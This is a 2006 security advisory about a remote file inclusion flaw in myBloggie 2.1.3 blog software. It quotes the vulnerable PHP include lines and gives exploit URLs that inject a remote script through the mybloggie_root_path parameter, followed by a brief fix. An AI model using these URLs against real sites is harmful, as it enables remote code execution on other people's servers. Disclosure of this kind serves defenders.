Security Advisory: myBloggie <= 2.1.3 (mybloggie_root_path) Remote File Inclusion Vulnerability

[EN] securityvulns.ru
no-pyccku

Related information
  Daily web applications security vulnerabilities summary (PHP, ASP, JSP, CGI, Perl)
  PHPMyRing <= 4.2.0 (view_com.
php) Remote SQL Injection
  Yabb XSS
  TinyWebGallery v1.5 ( image ) Remote Include Vulnerability
  Directory Traversal vulnerability in IPCheck Monitor Server

From: sh3ll_(at)_sh3ll.ir <sh3ll_(at)_sh3ll.ir>
Date: 11.08.2006
Subject: myBloggie <= 2.1.3 (mybloggie_root_path) Remote File Inclusion Vulnerability

------------------------------------------------------------------------
-----------------

myBloggie 2.1.3 mybloggie_root_path Remote File Inclusion

------------------------------------------------------------------------
-----------------

Author : Sh3ll

Date : 2006/04/29

Location : Iran - Tehran

HomePage : http://www.sh3ll.ir

Email : sh3ll[at]sh3ll[dot]ir

Critical Level : Dangerous

------------------------------------------------------------------------
-----------------

Affected Software Description:

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Application : myBloggie

version : 2.1.3

URL : http://www.mywebland.com , http://mybloggie.mywebland.com

Description :

myBloggie is considered one of the most simple, user-friendliest yet packed

with features Weblog system available to date.

------------------------------------------------------------------------
-----------------

Vulnerabilities:

~~~~~~~~~~~~~~~

in admin.php , index.php & db.php We Found Vulnerability Scripts

----------------------------------------admin.php-----------------------
-----------------

....

<?php

include($mybloggie_root_path.'spacer6.php');

?>

...

----------------------------------------index.php-----------------------
-----------------

....

<?php

}

if (!isset($mode)) {

include($mybloggie_root_path.'blog.php');

}

$template->pparse('sidevert');

}

// End right sidemenu condition

// Sidemenu menu items. You can change the menu item order here

include($mybloggie_root_path.'calendar.php');

include($mybloggie_root_path.'spacer.php');

include($mybloggie_root_path.'category.php');

include($mybloggie_root_path.'spacer.php');

include($mybloggie_root_path.'recent.php');

include($mybloggie_root_path.'spacer.php');

include($mybloggie_root_path.'archives.php');

include($mybloggie_root_path.'spacer.php');

include($mybloggie_root_path.'user.php');

include($mybloggie_root_path.'spacer.php');

if ($search) {

include($mybloggie_root_path.'searchform.php');

include($mybloggie_root_path.'spacer.php');

}

...

-------------------------------------------db.php-----------------------
-----------------

....

<?php

include($mybloggie_root_path .'includes/mysql.php');

?>

...

------------------------------------------------------------------------
-----------------

Exploit:

~~~~~~~

http://www.target.com/[myBloggie]/admin.php?mybloggie_root_path=[Evil Script]

http://www.target.com/[myBloggie]/index.php?mybloggie_root_path=[Evil Script]

http://www.target.com/[myBloggie]/includes/db.php?mybloggie_root_path=[E
vil Script]

Solution:

~~~~~~~~

Sanitize Variabel $mybloggie_root_path in admin.php , index.php & db.php

------------------------------------------------------------------------
-----------------

Shoutz:

~~~~~~

~ Special Greetz to My Best Friend N4sh3n4s & My GF Atena

~ To All My Friends in Xmors - Aria - Hackerz & Other Iranian Cyber Teams

test server